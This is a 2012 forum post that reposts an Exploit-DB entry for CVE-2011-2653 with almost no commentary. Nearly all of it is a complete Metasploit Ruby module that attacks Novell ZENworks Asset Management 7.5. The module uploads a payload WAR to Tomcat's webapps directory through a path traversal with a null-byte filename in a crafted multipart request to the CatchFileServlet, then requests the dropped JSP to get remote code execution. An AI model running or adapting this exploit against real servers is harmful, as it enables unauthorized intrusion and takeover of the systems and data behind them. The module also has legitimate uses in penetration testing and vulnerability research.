DarkyAngel Posted August 16, 2012 Report Posted August 16, 2012 [table=width: 500, class: grid][tr] [td]EDB-ID: 20502[/td] [td]CVE: 2011-2653[/td] [td]OSVDB-ID: 77583[/td][/tr][tr] [td]Author: metasploit[/td] [td]Published: 2012-08-15[/td] [td]Verified: [/td][/tr][tr] [td]Exploit Code: [/td] [td]Vulnerable App: N/A[/td] [td][/td][/tr][/table]### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# web site for more information on licensing and terms of use.# http://metasploit.com/##require 'msf/core'class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name' => 'Novell ZENworks Asset Management Remote Execution', 'Description' => %q{ This module exploits a path traversal flaw in Novell ZENworks Asset Management 7.5. By exploiting the CatchFileServlet, an attacker can upload a malicious file outside of the MalibuUploadDirectory and then make a secondary request that allows for arbitrary code execution. }, 'Author' => [ 'Unknown', # Vulnerability discovery 'juan vazquez' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2011-2653' ], [ 'OSVDB', '77583' ], [ 'BID', '50966' ], [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-342/' ], [ 'URL', 'http://download.novell.com/Download?buildid=hPvHtXeNmCU~' ] ], 'Privileged' => true, 'Platform' => [ 'java' ], 'Targets' => [ [ 'Java Universal', { 'Arch' => ARCH_JAVA, 'Platform' => 'java' }, ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Nov 02 2011')) register_options( [ Opt::RPORT(8080), OptInt.new('DEPTH', [true, 'Traversal depth to reach the Tomcat webapps dir', 3]) ], self.class ) end def exploit # Generate the WAR containing the payload app_base = rand_text_alphanumeric(4+rand(32-4)) jsp_name = rand_text_alphanumeric(8+rand(8)) war_data = payload.encoded_war(:app_name => app_base, :jsp_name => jsp_name).to_s uid = rand_text_alphanumeric(34).to_s data = "------#{uid}\r\n" data << "Content-Disposition: form-data; name=\"RequestParms\"\r\n\r\n" data << "\r\n" data << "------#{uid}\r\n" data << "Content-Disposition: form-data; name=\"language\"\r\n\r\n" data << "\r\n" data << "------#{uid}\r\n" data << "Content-Disposition: form-data; name=\"rtyp\"\r\n\r\n" data << "prod\r\n" data << "------#{uid}\r\n" data << "Content-Disposition: form-data; name=\"sess\"\r\n\r\n" data << "\r\n" data << "------#{uid}\r\n" data << "Content-Disposition: form-data; name=\"mode\"\r\n\r\n" data << "newreport\r\n" data << "------#{uid}\r\n" data << "Content-Disposition: form-data; name=\"dp\"\r\n\r\n" data << "n\r\n" data << "------#{uid}\r\n" data << "Content-Disposition: form-data; name=\"console\"\r\n\r\n" data << "\r\n" data << "------#{uid}\r\n" data << "Content-Disposition: form-data; name=\"oldentry\"\r\n\r\n" data << "\r\n" data << "------#{uid}\r\n" data << "Content-Disposition: form-data; name=\"act\"\r\n\r\n" data << "malibu.StartImportPAC\r\n" data << "------#{uid}\r\n" data << "Content-Disposition: form-data; name=\"saveact\"\r\n\r\n" data << "malibu.StartImportPAC\r\n" data << "------#{uid}\r\n" data << "Content-Disposition: form-data; name=\"isalert\"\r\n\r\n" data << "\r\n" data << "------#{uid}\r\n" data << "Content-Disposition: form-data; name=\"language\"\r\n\r\n" data << "\r\n" data << "------#{uid}\r\n" data << "Content-Disposition: form-data; name=\"queryid\"\r\n\r\n" data << "\r\n" data << "------#{uid}\r\n" data << "Content-Disposition: form-data; name=\"Locale\"\r\n\r\n" data << "MM/dd/yyyy\r\n" data << "------#{uid}\r\n" data << "Content-Disposition: form-data; name=\"CurrencySym\"\r\n\r\n" data << "$\r\n" data << "------#{uid}\r\n" data << "Content-Disposition: form-data; name=\"CurrencyPos\"\r\n\r\n" data << "start\r\n" data << "------#{uid}\r\n" data << "Content-Disposition: form-data; name=\"ThousandsSep\"\r\n\r\n" data << ",\r\n" data << "------#{uid}\r\n" data << "Content-Disposition: form-data; name=\"CurDecimalPt\"\r\n\r\n" data << ".\r\n" data << "------#{uid}\r\n" data << "Content-Disposition: form-data; name=\"MinusSign\"\r\n\r\n" data << "-\r\n" data << "------#{uid}\r\n" data << "Content-Disposition: form-data; name=\"sum\"\r\n\r\n" data << "\r\n" data << "------#{uid}\r\n" data << "Content-Disposition: form-data; name=\"grp\"\r\n\r\n" data << "\r\n" data << "------#{uid}\r\n" data << "Content-Disposition: form-data; name=\"col\"\r\n\r\n" data << "\r\n" data << "------#{uid}\r\n" data << "Content-Disposition: form-data; name=\"PreLoadRight\"\r\n\r\n" data << "yes\r\n" data << "------#{uid}\r\n" data << "Content-Disposition: form-data; name=\"console\"\r\n\r\n" data << "\r\n" data << "------#{uid}\r\n" data << "Content-Disposition: form-data; name=\"uploadFile\"; filename=\"/#{"../" * datastore['DEPTH']}#{app_base}.war\x00.txt\"\r\n" data << "Content-Type: application/octet-stream\r\n\r\n" data << war_data data << "\r\n" data << "------#{uid}\r\n" data << "Content-Disposition: form-data; name=\"SuccessPage\"\r\n\r\n" data << "Html/UploadSuccess.html\r\n" data << "------#{uid}--\r\n" res = send_request_cgi( { 'uri' => "/rtrlet/catch", 'method' => 'POST', 'ctype' => "multipart/form-data; boundary=----#{uid}", 'data' => data, }) print_status("Uploading #{war_data.length} bytes as #{app_base}.war ...") select(nil, nil, nil, 10) if (res.code == 500) print_status("Triggering payload at '/#{app_base}/#{jsp_name}.jsp' ...") send_request_raw( { 'uri' => "/#{app_base}/" + "#{jsp_name}" + '.jsp', 'method' => 'GET', }) else print_error("WAR upload failed...") end endendSursa Quote
